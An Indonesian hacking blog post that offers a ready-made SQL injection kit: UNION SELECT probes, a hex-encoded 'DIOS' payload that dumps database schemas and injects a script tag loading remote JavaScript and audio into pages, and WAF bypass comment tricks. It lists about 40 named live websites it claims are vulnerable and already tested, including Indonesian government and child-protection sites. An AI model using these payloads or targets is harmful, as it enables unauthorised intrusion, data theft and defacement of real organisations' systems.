Google Translet

Saturday, March 13, 2021

Kumpulan Web Vuln SQL 2021-popojago

March 13, 2021    No comments

web vuln sql 2021 

Web vuln sql 2021 -  Hai semua nya balik lagi di blog saya popojago,Saya akan menjelaskan apa itu sql injection SQL Injection adalah teknik yang menyalahgunakan celah keamanan yang ada pada lapisan basis data sebuah aplikasi. Celah ini terjadi ketika input dari pengguna tidak disaring secara benar, contohnya adalah kolom username yang seharusnya hanya diisi dengan huruf atau angka tapi malah diisi dengan karakter lain (seperti: โ€“ = โ€™) sehingga penyerang menggunakan celah tersebut dengan cara memasukan query dari SQL.
nah itu dia pengertia dari sql injection maka nya hati hati saat sql saya berikan kode kode sql
'+ORDER+BY+1--+- lalu UNION+SELECT+1,2,3,4,5--+- bisa liat tutor sebelum nya bagi kalian yang mau ngedump datbase bisa pake dios ini
dios :

concat(0x3C736372697074206C616E67756167653D226A617661736372697074223E616C657274282220496E6A65637420627920546E2E706F706F2E2022293B3C2F7363726970743E0D0A3C62723E3C68313E696E6A6563742062793A546E2E706F706F3C2F68313E0D0A3C736372697074207372633D2268747470733A2F2F63646E2E7261776769742E636F6D2F62756E676672616E676B692F6566656B73616C6A752F32613738303563372F6566656B2D73616C6A752E6A732220747970653D22746578742F6A617661736372697074223E3C2F7363726970743E0D0A3C617564696F206175746F706C61793D226175746F706C61792220636F6E74726F6C733D22636F6E74726F6C7322207372633D2268747470733A2F2F612E746F7034746F702E696F2F6D5F313839326A696B7077312E6D34612220747970653D22617564696F2F6D706567223E3C2F617564696F3E3C62723E,'<br>','<img src ="">',database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))








                                                                  Web vuln sql 2021







Oiya jika ada web yang gk aktif ato udah di tutup bug nya hubungin saya bebas lewat mana kolom komentar bisa:v







-web vuln sql 2021

-https://meanmentor.com/category.php?id=1
-https://www.smtmax.com/category.php?id=2
-https://www.smtmax.com/category.php?id=15
yang ada dua itu memang dobel ya dan semua nya vuln:v
-http://www.meggieschneider.com/php/detail.php?id=48
-http://www.embryohotel.com/room-detail.php?id=1
-https://www.tiphone.co.id/media/detail.php?news_id=8
-https://equitytower.co.id/gallery-detail.php?id=16
-https://equitytower.co.id/news-event-detail.php?id=-21
Tuh dobel lagi tapi ID nya beda:v
-https://lembagaperlindungananaktomohon.or.id/gallery-detail.php?id=1
btw itu pihak nya udah saya hubungi dan tidak ada respon
-https://www.sanliman.com/detail.php?id=17
-https://www.suzuki.co.id/mysuzukistory/detail.php?id=155
yang bisa ngerjain call suzuki tuh pro banget lu:v
-https://dpr.go.id/detail.php?id=4
Canda Heker:v ๐Ÿ˜†๐Ÿ˜†๐Ÿ˜†๐Ÿ˜†
-https://jdih.halbarkab.go.id/detail.php?id=425
-http://www.theclassichotel.in/room-detail.php?id=61
-https://jdih.halbarkab.go.id/detail.php?id=779
btw itu beda ya ama yang sbelum nya liat aja ID nya:v
-http://www.kotatanpasampah.id/artikel-detail.php?id=2
-
-
  1. http://mypets.co.id/detailnews.php?id=15
  2. http://www.aringocomputer.com/product.php?id=17
  3. http://www.hasnurgroup.com/lowongan.php?id=1
  4. http://www.savalihotel.com/holiday-index.php?id=1
  5. http://krlmania.com/sinyal/read.php?id=2142
  6. http://rsiabundasuryatni.com/artikel.php?id=142
  7. http://home-klik.com/product_detail.php?id=112
  8. http://seputarkediri.com/health/seputar-kediri.php?id=145
  9. http://www.ptbnk.com/product/detail.php?id=1
  10. http://www.pdw-architects.com/news.php?id=26
  11. http://www.herjandi.com/article.php?id=21
  12. http://www.produkabe.com/majakani.php?id=bisnisviden
  13. http://pelitaindonesia.ac.id/hapusupload.php?id=116
  14. http://hikmakaryapersada.com/artikel.php?id=32
  15. http://www.krlmania.com/gado/read.php?id=703
  16. http://www.dblindonesia.com/loop/newsdetail.php?id=10994
  17. http://jagiradvertising.com/detail_produk.php?id=15
  18. http://www.kafispolgama.or.id/umum_detail.php?id=2
  19. http://www.indonesianship.com/beritaisi.php?ID=2582
  20. http://www.vivocondom.com/news-detail.php?id=1
  21. http://stasolar.com/kategori.php?id=6
  22. http://roboticsindonesia.com/blog-view.php?id=36
  23. http://www.kaoscouple-jakarta.com/readnews.php?id=16
  24. http://www.tiketpesawatkita.com/?id=nanaz/artikel.php?id=18
  25. http://www.imahseniman.com/room-detail.php?r=Junior


Inject by:Tn.popo
Nb:Jika eror 403 saat union haru di bypass jika udah di order by masih eror hapus koma di atas nya/hapus %27 okh iya bypass nya di bwah ya

/*!union*/+/*!select*/
/*!12345union*/+/*!12345select*/
Saat di bypass tidak muncul angka di depan angka id/depan %27 kita kasih and false contoh https://web nya.co.id/detail.php?id=13%27 and false +/*!union*/+/*!select*/+1,2,3,4,5,6,78--+- jelas lagi jika udah union select tapi angka ajaib tidak muncul kasih strip kek gini - di seblum ID contoh
https://web nya.co.id/detail.php?id=-13+UNION+SELECT+1,2,3,4,5,6,7--+- belum paham? tulis no wa kalian di bawah entar saya chat
btw yang saya kasih web nya udah di coba semua:v jangan bilang gk bisakecuali yang dpr awoakwoakwokawokowk
makasi untuk magelang1337


Salam Hekerr awoakwoakwoakwoka Canda Hacker:v

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)